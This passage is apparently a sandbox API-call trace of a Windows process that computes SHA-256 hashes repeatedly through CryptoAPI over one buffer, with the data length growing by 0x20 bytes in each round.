	[0187.473] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.473] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.473] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0187.473] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fd28
	[0187.474] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fd28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fd28, pdwDataLen=0x128aac) returned 1
	[0187.474] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.474] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.474] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.474] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.474] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0187.474] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fd50
	[0187.474] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fd50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fd50, pdwDataLen=0x128aac) returned 1
	[0187.474] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.474] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.474] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.474] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.474] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0187.475] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fd78
	[0187.475] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fd78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fd78, pdwDataLen=0x128aac) returned 1
	[0187.475] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.475] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.475] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.475] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.475] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0187.475] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fda0
	[0187.475] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fda0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fda0, pdwDataLen=0x128aac) returned 1
	[0187.475] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.475] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.475] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.476] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.476] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0187.476] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fdc8
	[0187.476] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fdc8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fdc8, pdwDataLen=0x128aac) returned 1
	[0187.476] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.476] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.476] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.476] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.476] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0187.476] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fdf0
	[0187.476] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fdf0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fdf0, pdwDataLen=0x128aac) returned 1
	[0187.476] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.476] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.476] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.477] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.477] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0187.477] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fe18
	[0187.477] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fe18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fe18, pdwDataLen=0x128aac) returned 1
	[0187.477] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.477] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.477] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.477] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.477] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0187.477] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fe40
	[0187.477] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fe40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fe40, pdwDataLen=0x128aac) returned 1
	[0187.477] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.477] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.477] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.478] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.478] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0187.478] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fe68
	[0187.478] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fe68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fe68, pdwDataLen=0x128aac) returned 1
	[0187.478] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.478] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.478] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.478] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.478] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0187.478] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fe90
	[0187.478] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fe90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fe90, pdwDataLen=0x128aac) returned 1
	[0187.478] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.478] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.478] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.479] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.479] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0187.479] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272feb8
	[0187.479] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272feb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272feb8, pdwDataLen=0x128aac) returned 1
	[0187.479] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.479] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.479] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.479] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.479] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0187.479] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fee0
	[0187.479] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272fee0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fee0, pdwDataLen=0x128aac) returned 1
	[0187.479] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.479] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.479] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.480] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.480] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0187.480] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ff08
	[0187.480] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ff08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ff08, pdwDataLen=0x128aac) returned 1
	[0187.480] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.480] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.480] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.480] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.480] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0187.480] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ff30
	[0187.480] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ff30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ff30, pdwDataLen=0x128aac) returned 1
	[0187.480] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.480] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.480] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.481] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.481] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0187.481] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ff58
	[0187.481] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ff58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ff58, pdwDataLen=0x128aac) returned 1
	[0187.481] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.481] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.481] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.481] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.481] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0187.481] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ff80
	[0187.482] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ff80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ff80, pdwDataLen=0x128aac) returned 1
	[0187.482] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.482] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.482] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.482] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.482] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0187.482] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ffa8
	[0187.482] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ffa8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ffa8, pdwDataLen=0x128aac) returned 1
	[0187.482] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.482] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.482] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.482] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.483] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0187.483] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ffd0
	[0187.483] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ffd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ffd0, pdwDataLen=0x128aac) returned 1
	[0187.483] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.483] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.483] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.483] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.483] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0187.483] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272fff8
	[0187.483] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272fff8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272fff8, pdwDataLen=0x128aac) returned 1
	[0187.483] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.483] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.483] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.484] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.484] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0187.484] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730020
	[0187.484] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730020, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730020, pdwDataLen=0x128aac) returned 1
	[0187.484] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.484] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.484] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.484] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.484] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0187.484] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730048
	[0187.484] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730048, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730048, pdwDataLen=0x128aac) returned 1
	[0187.484] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.484] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.484] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.485] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.485] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0187.485] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730070
	[0187.485] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730070, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730070, pdwDataLen=0x128aac) returned 1
	[0187.485] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.485] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.485] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.485] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.485] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0187.485] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730098
	[0187.485] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730098, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730098, pdwDataLen=0x128aac) returned 1
	[0187.485] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.485] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.485] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.486] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.486] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0187.486] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27300c0
	[0187.486] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x27300c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27300c0, pdwDataLen=0x128aac) returned 1
	[0187.486] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.486] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.486] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.486] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.486] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0187.486] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27300e8
	[0187.486] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27300e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27300e8, pdwDataLen=0x128aac) returned 1
	[0187.486] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.486] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
